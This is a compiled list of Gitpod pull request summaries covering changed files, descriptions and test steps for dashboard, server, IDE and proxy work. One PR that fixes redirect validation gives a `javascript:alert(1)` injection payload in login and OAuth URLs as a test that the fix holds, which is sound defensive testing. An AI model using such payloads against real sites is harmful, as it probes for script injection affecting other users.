<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Fix JetBrains Plugin publish bug

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.92.0`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.27849</li> …
> [VS Code Browser] Update stable code to `1.92.0`

- components/dashboard/src/user-settings/PersonalAccessTokens.tsx
This pull request removes the `Beta` label from the Gitpod Access Tokens in the dashboard. Related [internal conversation](https://gitpod.slack.com/archives/C047WL9JBLG/p1722601954064389)
Fixes ENT-589
<ul>
<li><b>🏷️ Name</b> - siddhant-e2069454c87</li>
<li><b>🔗 URL</b> - <a href="https://siddhant-e2069454c87.preview.gitpod-dev.com/workspaces" target="_blank">siddhant-e2069454c87.preview.gitpod-dev.com/workspaces</a>.</li> …
> [dashboard] Remove `Beta` Label from Gitpod Access Tokens

- components/dashboard/src/workspaces/WorkspaceEntry.tsx
Refactored the tooltip in the WorkspaceEntry component to display the relative time (e.g. "2 days ago") as visible text and the exact date and time with GMT offset on hover.
| <img width="728" alt="image" src="https://github.com/user-attachments/assets/8231fc93-5899-4444-9cfe-0c55a8c1ea9a"> | <img width="744" alt="image" src="https://github.com/user-attachments/assets/dbeb454a-edd5-48e5-adca-789037fb044f"> | 
<details><summary>Inspiration from GitHub</summary>
<p>
</p>
</details> 
Fixes ENT-588
Addresses [user feedback](https://gitpod.slack.com/archives/C0420AN379Q/p1722643204622079)
- Open preview environment & complete onboarding
- Create a workspace & stop it
- Hover on Workspace activity time (e.g., hover on `2 minutes ago`) in the workspaces …
> [dashboard] Refactor workspace last active time tooltip

- components/dashboard/src/components/PrebuildLogs.tsx
- components/dashboard/src/data/workspaces/default-workspace-image-query.ts
- components/dashboard/src/start/StartPage.tsx
- components/dashboard/src/start/StartWorkspace.tsx
- components/gitpod-protocol/src/protocol.ts
- components/server/src/workspace/gitpod-server-impl.ts
- components/server/src/workspace/headless-log-controller.ts
- components/server/src/workspace/workspace-service.spec.db.ts
- components/server/src/workspace/workspace-service.ts
When fixing chunking-issues, we lost sight of some older clients that still use the json-rpc interface, and are constrained by it's limitations. This PR makes sure we only transmit primitive data types.
Fixes ENT-618
Fixes ENT-255 (got too annoying while debugging)
- example branch: https://github.com/geropl/gitpod-test-repo/tree/gpl/docker-build-10mins
- start a workspace which requires an image build: verify how logs are streamed correctly :heavy_check_mark: 
- (reset for test by bumping this number: [line](https://github.com/geropl/gitpod-test-repo/blob/gpl/docker-build-10mins/.gitpod/Dockerfile#L3))
- trigger a prebuild for a workspaces which requires an image build: verify how logs are streamed correctly in the prebuild details view :heavy_check_mark: 
gitpod:summary
<details> …
> [dashboard, server] Fix streaming of image build logs

- WORKSPACE.yaml
Build code version `1.92.1` (`f89b31db4e103a12b1f2250d16c7ae6ac6384e82`)
Relates ENT-636
<ul>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735e38eec39" target="_blank">internal documentation</a> for information on how to interact with your …
> [VS Code Browser] Build stable code `1.92.1`

- components/server/src/bitbucket-server/bitbucket-server-context-parser.spec.ts
- components/server/src/bitbucket/bitbucket-context-parser.ts
- components/server/src/prebuilds/incremental-workspace-service.ts
- components/server/src/workspace/workspace-factory.spec.db.ts
- components/server/src/workspace/workspace-service.ts
- components/server/src/workspace/workspace-starter.ts
Turned out we don't have any gaps in the context parsing/workspace creation behavior with prebuilds.
This PR confirms that with some tests.
Fixes ENT-600
- see that all tests are green :heavy_check_mark: 
- BitBucketServer tests:
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Valid …
> [server] Add some tests

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.92.1`
Fixes ENT-636
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.27981</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22prev …
> [VS Code Browser] Update stable code to `1.92.1`

- dev/jetbrains-test/test.sh
- test/tests/ide/jetbrains/gateway_test.go
`$HOME`, `~` are not the same with what Java wanted (user.home) in `GHA` x `container`
Fixes ENT-635
See https://github.com/gitpod-io/gitpod/actions/runs/10355357489/job/28663273850
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Fix JetBrains integration tests

- components/dashboard/src/workspaces/WorkspaceEntry.tsx
Something in our grid column styles are making Safari <18 misbehave and think the workspace list entry is much taller than it actually is. This PR patches that by not letting the element take up all the space available to it.
| <img width="1562" alt="image" src="https://github.com/user-attachments/assets/96d503a0-d2a4-429e-9b65-a11b005180e7"> | <img width="1562" alt="image" src="https://github.com/user-attachments/assets/73845f67-6de9-4822-a941-0872c8b79ae4"> | 
These are the styles that it has problems with, if anyone has any ideas to what the actual cause may be. From the [Safari 18 release notes](https://developer.apple.com/documentation/safari-release-notes/safari-18-release-notes) (that version is no longer affected by this), I could not find …
> Fix workspace list grid on Safari

- components/public-api-server/pkg/apiv1/identityprovider.go
- components/public-api-server/pkg/apiv1/identityprovider_test.go
The motivation is to have more uniform URL shapes to match against e.g. across different IDEs.
Fixes ENT-535
- start a workspace **with Intellij**
- try verify against an external OIDC handler (how to do that?) and check the shape 
- check that `sub` and `context` claims don't contain the `referrer:` prefix
https://gpl-535-oidc-sub.preview.gitpod-dev.com/workspaces
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [OIDC] IDP: use workspace.context.normalizedContextUrl to fill the "sub" and "context" claims of the IDToken

- components/image-builder-mk3/pkg/orchestrator/orchestrator.go
- components/image-builder-mk3/pkg/resolve/resolve.go
- components/image-builder-mk3/pkg/resolve/resolve_test.go
Make sure that "429" errors are not tagged as `imageBuildFailedUser` in `server`.
Fixes ENT-644
- check that unit tests are green :heavy_check_mark: 
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [image-builder] Detect "429 - Too Many Request" and bubble up as "Unavailable"

- .github/workflows/jetbrains-integration-test.yml
JetBrains Tests workflow will be cancelled because of incorrect concurrency settings of runner
https://github.com/gitpod-io/gitpod/actions/runs/10386977173
Fixes #
No need
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [gha] fix incorrect runner concurrency setting

- components/dashboard/src/data/featureflag-query.ts
Finally! :tada:
Fixes ENT-270
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [dashboard] Remove last unused feature flag references

- WORKSPACE.yaml
- dev/preview/workflow/preview/patch-ide-configmap.js
- install/installer/pkg/components/ide-service/ide-configmap.json
Fixes ENT-651
- Wait for last GHA to finished
- Open Preview env, create workspace with stable IntelliJ IDEA
- It should be able to launch and connect using Gateway + IntelliJ IDEA
- GHA's `integration tests` should be passed
<ul>
<li><b>🏷️ Name</b> - hw-ij-upgrade</li>
<li><b>🔗 URL</b> - <a href="https://hw-ij-upgrade.preview.gitpod-dev.com/workspaces" target="_blank">hw-ij-upgrade.preview.gitpod-dev.com/workspaces</a>.</li> …
> [JetBrains] force upgrade IntelliJ IDEA to `2024.2`

- WORKSPACE.yaml
Build code version `1.92.2` (`d3154abb3063a04fb5ff6fa77d820761a1e0ab8c`)
Relates ENT-656
<ul>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735e38eec39" target="_blank">internal documentation</a> for information on how to interact with your …
> [VS Code Browser] Build stable code `1.92.2`

- components/ide/jetbrains/launcher/main.go
- components/ide/jetbrains/launcher/main_test.go
Golang `os.Stat` will follow to link to get stat info of the source file 😬 which is not expected in current usage
Fixes ENT-654
- Create a repository with https://github.com/mustard-mh/test/blob/repro/ENT-654-2/.gitpod.yml
- Trigger prebuild for branch `repro/ENT-654-2`
- Start a workspace with stable `IntelliJ IDEA` and context `https://github.com/mustard-mh/test/blob/repro/ENT-654-2/.gitpod.yml`
- It should be able to access workspace with IntelliJ IDEA
<ul>
<li><b>🏷️ Name</b> - hw-jb-fix-2</li>
<li><b>🔗 URL</b> - <a href="https://hw-jb-fix-2.preview.gitpod-dev.com/workspaces" target="_blank">hw-jb-fix-2.preview.gitpod-dev.com/workspaces</a>.</li> …
> Fix incorrect usage of `os.Stat`

- components/server/src/oauth-server/db.ts
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [TB] limit OAuth scopes

- .github/workflows/update-image-digest.yml
So that we don;t have to look for preview link in GHA's summary page like https://github.com/gitpod-io/gitpod/pull/20134
Fixes #
No need
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [gha] add preview summary to images digests update PR

- components/ide-service/pkg/server/server.go
- components/ide/jetbrains/launcher/main.go
Fixes ENT-663
- Create workspace with stable **GoLand**
- It should be able to launch with JetBrains Gateway
✔️ <img width="798" alt="image" src="https://github.com/user-attachments/assets/daf39707-7b98-432a-ba42-654a62fe5cb1">
<ul>
<li><b>🏷️ Name</b> - hw-tb-2</li>
<li><b>🔗 URL</b> - <a href="https://hw-tb-2.preview.gitpod-dev.com/workspaces" target="_blank">hw-tb-2.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - hw-tb-2-gha.28197</li>
<li><b>🗒️ …
> [TB] Update respond data of joinLink2

- install/installer/pkg/components/ide-service/ide-configmap.json
Fixes ENT-670
- Open preview env https://hw-ij.preview.gitpod-dev.com/workspaces
- Pin IDEA version to `2024.1.4`
- Start a workspace with IDEA 2024.1.4
- Check if it's actually 2024.1.4
|Org settings||
|:-:|:-:|
|<img width="1074" alt="image" src="https://github.com/user-attachments/assets/936a07b0-e73e-4d70-91a4-62c294081aaa">|<img width="815" alt="image" src="https://github.com/user-attachments/assets/31e079dd-229f-44ed-9c6e-1d184fe0560a">|
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
<summary>Preview Environment / …
> Append IDEA `2024.1.4` to versions list

- components/ide/jetbrains/backend-plugin/build.gradle-latest.kts
- components/ide/jetbrains/backend-plugin/build.gradle.kts
- components/ide/jetbrains/backend-plugin/build.sh
- components/ide/jetbrains/backend-plugin/gradle-latest-rider.properties
- components/ide/jetbrains/backend-plugin/gradle-stable-rider.properties
Main build failed https://github.com/gitpod-io/gitpod/actions/runs/10528902989/job/29175535238 because it's using IC (IDEA) instead of RD (Rider) to verify plugin
```
[components/ide/jetbrains/backend-plugin:plugin-stable-rider] > Task :runPluginVerifier
.....
[components/ide/jetbrains/backend-plugin:plugin-stable-rider] 2024-08-23T16:20:58 [main] INFO  verification - Finished 1 of 1 verifications (in 8.2 s): IC-241.14494.240 against io.gitpod.jetbrains.remote:0.0.1-53299137d92bee639e9f0897bfa5491b947fbbd5-stable-rider: 1 missing mandatory dependency. 4 possible compatibility problems, some of which may be caused by absence of dependency in the target IDE IC-241.14494.240. 9 usages of deprecated API. 39 usages of experimental API. 46 usages of internal API. 4 plugin configuration defects …
```
> Fix Rider build on main

- install/installer/pkg/components/ide-service/ide-configmap.json
- test/tests/ide/jetbrains/gateway_test.go
Follow up for https://github.com/gitpod-io/gitpod/pull/20141
Fixes #20132, ENT-679
- Update pinable version for Rider in org settings page
- Start workspace with Rider's old versions
- Verify it's working (check `gp open README.md` or tasks terminals)
✅ 
|2024.1|2024.1.1|2024.1.2|2024.1.3|2024.1.4|
|:-:|:-:|:-:|:-:|:-:|
|<img width="958" alt="image" src="https://github.com/user-attachments/assets/a0b8aadb-1470-43be-a23b-c5e0692319dd">|<img width="976" alt="image" src="https://github.com/user-attachments/assets/2315d353-ad00-43f8-a803-b814ab6be54b">|<img width="950" alt="image" src="https://github.com/user-attachments/assets/6ab5477e-4116-46cd-b271-69a0869d58eb">|<img width="872" alt="image" src="https://github.com/user-attachments/assets/ac32a954-7833-4078-950d-d4ef6d0a53b5">|<img …
> Update Rider versions' backend-plugin image

- components/ws-daemon/pkg/iws/iws.go
- components/ws-daemon/pkg/iws/uidmap.go
Use supervisor mount namespace for nfs mount
Fixes ENT-677
- Use this docker compose file
```
volumes:
efs:
driver: local
driver_opts:
type: nfs4
o: nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2,noresvport,address=
device: yoursharename:/
services:
postgres-15:
user: 33333:33333
environment:
POSTGRES_PASSWORD: admin
PGDATA: /var/lib/gitpod
image: postgres
restart: always
hostname: postgres
shm_size: 1g
ports:
- "5432:5432"
volumes:
- efs:/var/lib/gitpod
```
- docker compose up
- Postgres should write its data files to the nfs share
gitpod:summary
<details>
</details>
<details>
</details>
<details>
Add desired feature …
> Use supervisor mount namespace for nfs mount

- components/server/src/workspace/gitpod-server-impl.ts
Currently, we listen for all prebuild updates on all projects on all organizations the user has access to. This change optionally disables that default.
https://ft-websock8116b02d8e.preview.gitpod-dev.com/workspaces
Make sure you can watch prebuilds (the feature flag is turned on for the preview environment)
> Feature flag for disabling listening for all prebuild updates

- components/dashboard/src/Login.tsx
- components/dashboard/src/OauthClientApproval.tsx
- components/dashboard/src/utils.test.ts
- components/dashboard/src/utils.ts
- components/server/src/oauth-server/oauth-controller.ts
Fixes ENT-537
- Log into preview env with url `<preview_env>/login?returnToPath=javascript:alert(1)` -> `https://hw-ent-537.preview.gitpod-dev.com/login?returnToPath=javascript:alert(1)`
- Should have no alert
- Try with oauth steps (i.e. use Gitpod CLI to login into preview env) and add or replace search param with `returnToPath=javascript:alert(1)` -> `https://hw-ent-537.preview.gitpod-dev.com/oauth-approval?clientID=gitpod-cli&clientName=Gitpod%20CLI&returnToPath=javascript%3Aalert(1)%3B%2F%2F`
- Should have no alert
Replace preview url above with gitpod.io, they should show alert ()
**Regression Tests**
Test with possible OAuth Clients, they should be able to authenticate
- Gitpod CLI
- JetBrains Gateway
- VS Code Desktop …
> Validate redirect url

- components/gitpod-cli/cmd/validate.go
[gp validate] using `gitpod/workspace-full:latest` as default image
The reason for not using installationDefaultImage is that in dedicated instances, the default image points to a private ECR, which can be successfully pulled on the node, but not in the workspace due to the lack of credentials.
Fixes ENT-374
Fixes ENT-649
1. start a non gitpodify workspace in this preview env
2. try `gp validate`
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [gp validate] using `gitpod/workspace-full:latest` as default image

- components/ws-proxy/go.mod
- components/ws-proxy/go.sum
- components/ws-proxy/pkg/config/config.go
- components/ws-proxy/pkg/proxy/config.go
- components/ws-proxy/pkg/proxy/routes.go
- components/ws-proxy/pkg/proxy/routes_test.go
- install/installer/pkg/common/common.go
- install/installer/pkg/common/common_test.go
- install/installer/pkg/components/proxy/networkpolicy.go
- install/installer/pkg/components/ws-proxy/deployment.go
Fixes ENT-538
See [internal chat](https://gitpod.slack.com/archives/C071G5TTS49/p1724754595201039)
Preview env should work well
- Workspace can start
- Open with VS Code Browser, Gitpod CLI , JetBrains Gateway, VS Code Browser
- Can access private port
<ul>
<li><b>🏷️ Name</b> - hw-ent-538</li>
<li><b>🔗 URL</b> - <a href="https://hw-ent-538.preview.gitpod-dev.com/workspaces" target="_blank">hw-ent-538.preview.gitpod-dev.com/workspaces</a>.</li> …
> Improve CORS settings

- components/ws-proxy/pkg/config/config.go
- install/installer/pkg/common/common.go
Fixes #
Preview env is ready and up
<ul>
<li><b>🏷️ Name</b> - hw-fix-proxy</li>
<li><b>🔗 URL</b> - <a href="https://hw-fix-proxy.preview.gitpod-dev.com/workspaces" target="_blank">hw-fix-proxy.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - hw-fix-proxy-gha.28400</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-hw-fix-proxy%22%0A%0A--%20Filter%20on%20service:%0A--%20jsonPayloa …
> Fix `ws-proxy` pending

- components/dashboard/src/start/StartWorkspace.tsx
- components/gitpod-protocol/package.json
- components/gitpod-protocol/src/metrics.ts
- components/gitpod-protocol/tsconfig.json
- components/supervisor/frontend/package.json
- components/supervisor/frontend/src/ide/ide-metrics-service-client.ts
- yarn.lock
Gives our metrics calls less priority in comparison to mission-critical resources like API requests. 
1. Make sure things in the [preview environment](https://ft-metrics3af7f1b94e.preview.gitpod-dev.com/workspaces) still work
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Lower fetch priority of metrics

- test/tests/ide/jetbrains/gateway_test.go
- test/tests/ide/jetbrains/warmup-indexing.sh
Fixes Tests on https://github.com/gitpod-io/gitpod/pull/20160 failed without any useful info
Check GHA integration tests https://github.com/gitpod-io/gitpod/actions/runs/10663070116/job/29551898700?pr=20165, they should pass with proper `stdout:`
<ul>
<li><b>🏷️ Name</b> - hw-jb-int-test-1</li>
<li><b>🔗 URL</b> - <a href="https://hw-jb-int-test-1.preview.gitpod-dev.com/workspaces" target="_blank">hw-jb-int-test-1.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 …
> Improve JetBrains integration tests to show proper failed message

- WORKSPACE.yaml
Patch https://github.com/gitpod-io/openvscode-server/commit/2bb866718ab3d0a3a79e1e8c90457d54bd3fd05e
Relates ENT-742
- Open a workspace in preview env with **Latest VS Code Browser**
- Everything works well (light smoke test is enough)
- VS Code's commit hash in About page (Menu (click) > Help > About) should be `2bb866718ab3d0a3a79e1e8c90457d54bd3fd05e`
**Patch**
- Open workspace in preview env with **Latest VS Code Browser** + repo https://github.com/mustard-mh/test/tree/vscode/open-with-browser (main content see `extension.js`)
- Menu Bar > Run and Debug > Run Extension
- It should open a new tab, and then prompt to ask if you want to open `https://google.com`
|About|Patch|
|:-:|:-:|
|<img width="1142" alt="image" src="https://github.com/user-attachments/assets/08744ec4-c7c1-4ad9-9ac3-3 …
> Build patch for VS Code Browser

- components/gitpod-cli/cmd/preview.go
Fixes ENT-743
https://hw-preview-err.preview.gitpod-dev.com/workspaces
- Open a workspace in preview env
- Exec command below, there should have no error and prompt to open `google.com`
```
gp preview --external https://google.com
```
- Exec command below, it should show error messages
```
ELECTRON_RUN_AS_NODE=1 gp preview --external https://google.com
```
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [GP-CLI] fix `gp preview` not outputting stderr and stdout properly

- .github/workflows/code-nightly.yml
Update code nightly job's branch to `gp-code/release/1.93` before official publish
Relates ENT-750
No need
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Valid options are `all`, `workspace`, `webapp`, `ide`, `jetbrains`, `vscode`, `ssh`. If enabled, `with-preview` and `with-large-vm` …
> Switch code nightly job

- components/dashboard/src/service/public-api.ts
- components/gitpod-protocol/src/util/timeout.ts
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [PAPI] Use "Timeout" for setting up a connectionTimeout

- components/dashboard/src/service/service.tsx
- components/gitpod-protocol/src/frontend-dashboard-service.ts
- components/gitpod-protocol/src/util/timeout.spec.ts
- components/gitpod-protocol/src/util/timeout.ts
- components/gitpod-protocol/tsconfig.json
- components/supervisor/frontend/src/ide/supervisor-service-client.ts
- components/supervisor/frontend/src/index.ts
- components/supervisor/frontend/src/shared/frontend-dashboard-service.ts
- components/ws-proxy/pkg/proxy/pass.go
- components/ws-proxy/pkg/proxy/routes.go
This PR:
- ws-proxy: enables INFO logging for /supervisor/v1/status/(ide|content|supervisor) endpoints
- add tracking for connection attempts towards supervisor `status` endpoints
- requires a small follow-up PR to actually export the event `supervisor_check_ready` data from Dedicated installations
- introduces a re-try logic (every 5s) on the supervisor `status` endpoints, to avoid being stuck on stale requests
- this is just a theory so far, and needs to be validated with he tracking above :point_up: 
- the re-try is guarded by the `supervisor_check_ready_retry` feature flag (default: false)
Fixes ENT-672
- https://gpl-672-sup-front.preview.gitpod-dev.com/workspaces
- confirm configcat featureFlag `supervisor_check_ready_retry` = false
- start workspace (workspaceId must not contain …
> [supervisor] Frontend: re-try + track "checkReady"

- WORKSPACE.yaml
Build code version `1.93.0` (`9fb9b0e32ba3f2abcb214577ef14173b0df7e8d2`)
<ul> …
> [VS Code Browser] Build stable code `1.93.0`

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.93.0`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.28629</li> …
> [VS Code Browser] Update stable code to `1.93.0`

- components/dashboard/src/start/StartWorkspace.tsx
It's unclear as to if that's a real bug, fixing it here is good anyway.
We will confirm later using frontend tracking that is added in parallel.
Fixes ENT-732
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [dashboard] Potential fix for "lost workspace updates" in StartWorkspace.tsx introduced in #20095

- components/gitpod-cli/cmd/env.go
- components/gitpod-cli/cmd/validate.go
- components/gitpod-protocol/go/gitpod-service.go
- components/gitpod-protocol/go/mock.go
- components/server/src/workspace/workspace-starter.ts
This PR does two things:
- drops references to the long-deleted API call `getEnvVars`
- introduces a new flag `--scope=[user|repo]` to allow `update` on already existing user-scoped environment variables
###Discussion:
Permissions on environment variables are delicated, as they touch on the "workspace as trust boundary" principle. So far we have been very careful do not allow any cross-repository/-workspace "cross-talk" on the API level.
I still feel the slight expansion to update _existing, globally-visible_ env vars make sense.
Alternatively, we could introduce a property "globally writable" on env vars, to make this even more explicit. WDYT?
Fixes ENT-529
- start a workspace here: https://gpl-529-scope-user.preview.gitpod-dev.com/workspaces
- run these commands:
```
gitpod …
```
> [gp] Allow update of existing user-scoped env vars

- components/gitpod-protocol/go/gitpod-service.go
- components/gitpod-protocol/go/user.go
- components/gitpod-protocol/go/user_test.go
- components/gitpod-protocol/src/protocol.ts
- components/public-api-server/pkg/apiv1/identityprovider.go
- components/public-api-server/pkg/apiv1/identityprovider_test.go
This mirrors the mechanism we use on the TS side into Go (filtering and sorting by `lastSigninTime`), and uses it in the identiyprovider.
Relates to: ENT-764
Fixes: EXP-202
- join my SSO org: https://gpl-764-sso-email.preview.gitpod-dev.com/login/supercorp
- start a workspace, and run `eval echo $(gp idp token --audience=a --scope=s --decode | jq .Payload.email)`
- it will always return your Google email, taken from the SSO provider :heavy_check_mark: 
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
<summary>Preview Environment / …
> [idp] Guarantee stable email address for IDP token for organization-bound users

- components/gitpod-cli/cmd/user-info.go
Does what it says on the tin.
Usage:
```
gitpod /workspace/gitpod $ ./gitpod-cli user-info --json
{"user_id":"....","email":"gero@gitpod.io"}
gitpod /workspace/gitpod $ ./gitpod-cli user-info --email
gero@gitpod.io
```
Fixes ENT-764
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Valid …
> [gp] Introduce "gp user-info" showing userId and email

- WORKSPACE.yaml
Build code version `1.93.1` (`dbe6cce70f2466a5f716a17d4fccdf198ca6287f`)
<ul> …
> [VS Code Browser] Build stable code `1.93.1`

- components/public-api/typescript-common/src/auth-providers.ts
- components/server/src/bitbucket-server/bitbucket-server-auth-provider.ts
- components/server/src/bitbucket-server/bitbucket-server-oauth-scopes.ts
- components/server/src/bitbucket/bitbucket-oauth-scopes.ts
- components/server/src/user/token-service.ts
- Gets rid of the `WEBHOOK` scope for Bitbucket
- Gets rid of the mandatory `REPO_ADMIN` and `PROJECT_ADMIN` scopes and make them optional to toggle for Bitbucket Server
Fixes ENT-549
1. [Sign up](https://ft-bb-scope-changes.preview.gitpod-dev.com/orgs/join?inviteId=cad0671f-2e32-4257-83e6-f15fedb38495) to my org (it's free!)
2. Open something like https://bitbucket.gitpod-dev.com/users/filip/repos/repodepo
3. Try to push to the repo (although maybe you'll need to make your own repo to have permissions for that).
> Reduce required Bitbucket scopes

- License.third-party.go.txt
via
GITHUB_TOKEN=(...) ./scripts/go-licenses.sh
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Updated license list for golang dependencies

- install/installer/pkg/components/ide-service/ide-configmap.json
Update code to `1.93.1`
<ul>
<li><b>📦 Version</b> - ide-code-release-gha.28854</li> …
> [VS Code Browser] Update stable code to `1.93.1`

- components/ws-proxy/pkg/common/infoprovider.go
- components/ws-proxy/pkg/proxy/metrics.go
- components/ws-proxy/pkg/proxy/pass.go
- components/ws-proxy/pkg/proxy/routes.go
- components/ws-proxy/pkg/proxy/workspacerouter.go
Introduce RED metrics for ws-proxy for client and server requests. This also lets us inspect http_version (as a label) on requests.
@akosyakov originally started this work in https://github.com/gitpod-io/gitpod/pull/17294 (it never landed on main). @kylos101 fixed a couple minor things (see later commits in this PR) and tested.
Fixes ENT-673
1. Setup a port forward for grafana in the preview environment for this PR, `kubectl port-forward deployment/grafana -n  monitoring-satellite 3000` (add observability if it is missing with `leeway run dev/preview:deploy-monitoring-satellite`).
2. [Start a workspace in the preview environment from our demo-docker repo](https://kylos101-ent-673.preview.gitpod-dev.com/new#https://github.com/gitpod-demos/voting-app) (it starts a voting and runs them on …
> [ws-proxy] introduce RED metrics, including a http_version label

- components/gitpod-cli/cmd/env.go
- components/gitpod-cli/cmd/validate.go
Introduces a helpful message incl. clickable link instead of technical error message.
Context: ENT-529
- open workspace
- `gp env --scope=user MORE_TESTS=asd`
- see the error message
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [gp] Add helpful message in case "gp env --scope=user" fails because of missing create permission

- components/server/src/analytics-controller.ts
This PR updates the `setHashedUserIdCookie` method in the analytics controller. The changes include:
- Adding a server-side implementation to determine the appropriate domain for setting the cookie based on the request hostname
Followup of #20226
Fixes https://github.com/gitpod-io/gitpod/pull/20226/files#r1763283486
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
Saves …
> refactor: Update setHashedUserIdCookie method in analytics controller

- components/server/src/analytics-controller.ts
- components/server/src/session-handler.spec.db.ts
- components/server/src/session-handler.ts
This PR introduces a new feature to set a hashed user ID cookie for analytics purposes on specific Gitpod domains. The cookie is set during the JWT refresh process, ensuring it's always up-to-date for authenticated users.
Changes:
- Added `setHashedUserIdCookie` method to `SessionHandler` class
- Integrated cookie setting logic into `jwtSessionConvertor` method
- Implemented domain-specific checks for cookie setting
Followup of #20226
Fixes ENT-801
<ul>
<li><b>🏷️ Name</b> - siddhant-e53e12238f3</li>
<li><b>🔗 URL</b> - <a href="https://siddhant-e53e12238f3.preview.gitpod-dev.com/workspaces" target="_blank">siddhant-e53e12238f3.preview.gitpod-dev.com/workspaces</a>.</li> …
> Implement hashed user ID cookie for analytics on Gitpod domains

- components/dashboard/src/user-context.tsx
- components/server/src/auth/login-completion-handler.ts
- components/server/src/session-handler.ts
This PR introduces two changes:
- Forces JWT cookie verification after a set time after page load (20 seconds)
- Issues the hashed user ID cookie after login, so that we make its use consistent with our regular auth cookie lifecycle
Fixes https://gitpod.slack.com/archives/C071G5TTS49/p1726677726256909?thread_ts=1726648214.862269&cid=C071G5TTS49
Test today at https://ft-initial835bbe244e.preview.gitpod-dev.com/workspaces
<ul>
<li><b>🏷️ Name</b> - ft-initial835bbe244e</li>
<li><b>🔗 URL</b> - <a href="https://ft-initial835bbe244e.preview.gitpod-dev.com/workspaces" target="_blank">ft-initial835bbe244e.preview.gitpod-dev.com/workspaces</a>.</li> …
> Hashed user ID cookie improvements

- components/ide-proxy/Dockerfile
A regular update to reflect the state upstream. As of this PR, we are pointing to https://github.com/open-vsx/publish-extensions/commit/dfa20ca6716282d799c58d10751f94cbc3471775
> Update Open VSX extension control manifest

- components/gitpod-cli/cmd/validate.go
- components/gitpod-cli/cmd/validate_test.go
- components/gitpod-cli/go.mod
Makes log streaming not utilize any fixed-size buffers, and instead accepts not just `\n`, but also `\r` as a newline character.
Fixes ENT-629
You can test logging by cloning a repo under `/workspace` and executing something along the lines of the following (from `components/gitpod-cli`):
```
go run . validate --workspace-folder /workspace/spring-petclinic/ --headless --prebuild
```
A test of some common scenarios (such as long line entries, multibyte Unicode characters and same-line updates) can be tested by running this on https://github.com/filiptronicek/test-foofies/tree/ft/log.
> [Workspace CLI] better logs streaming for `validate`

- components/server/src/bitbucket-server/bitbucket-server-context-parser.spec.ts
- components/server/src/bitbucket-server/bitbucket-server-context-parser.ts
Improves our context parser so that we can handle branches/tags without the explicit `refs/*` prefix. We do so by asking the BBS API if there is a branch called `$1` and if not, we try to resolve `$1` as a tag.
Fixes ENT-825
See unit tests updates. They pass when running with a token in a workspace.
Also, you can test this in [my org](https://ft-bbs-betde71ad6422.preview.gitpod-dev.com/orgs/join?inviteId=54bc3b0f-9101-4351-a83b-a06120e23829) on the preview environment. Just try opening 
```
https://bitbucket.gitpod-dev.com/projects/GIT/repos/gitpod-test-repo/commits?until=test-tag-v1.0.1
```
> [Bitbucket Server] better tag context handling

- components/ide/code/BUILD.yaml
- components/ide/code/leeway.Dockerfile
- components/ide/code/leeway.nightly.Dockerfile
- components/ide/gha-update-image/BUILD.yaml
- components/local-app-api/typescript-grpcweb/webpack.config.js
- https://github.com/gitpod-io/openvscode-server/pull/578
Fixes ENT-787
- Open workspace with current PR
- Exec commands (it should have cached already)
```
cd /workspace/gitpod/components/ide/code
leeway build \
-Dversion=test \
-DimageRepoBase=eu.gcr.io/gitpod-dev-artifact/build \
-DcodeCommit=<latest_commit_of_openvscode_pr>\
-DcodeVersion=1.94.0 \
-DcodeQuality=insider \
.:docker-nightly
```
- Exec commands, and wait 20 more seconds
```
cd /workspace/gitpod/components/ide/gha-update-image
leeway run .:code-use-dev-latest
```
- Open preview env, and use `latest` editors
- Open a workspace with latest VS Code Browser
**Test with Lates VS Code Browser**
- It can open workspace with -> you can see UI of VS Code Browser
- It shows proper commit sha in VS Code's **About** window (last …
> [GHA] fix code nightly job

- components/ws-proxy/cmd/run.go
- components/ws-proxy/pkg/common/infoprovider.go
- components/ws-proxy/pkg/proxy/auth.go
- components/ws-proxy/pkg/proxy/auth_test.go
- components/ws-proxy/pkg/proxy/infoprovider.go
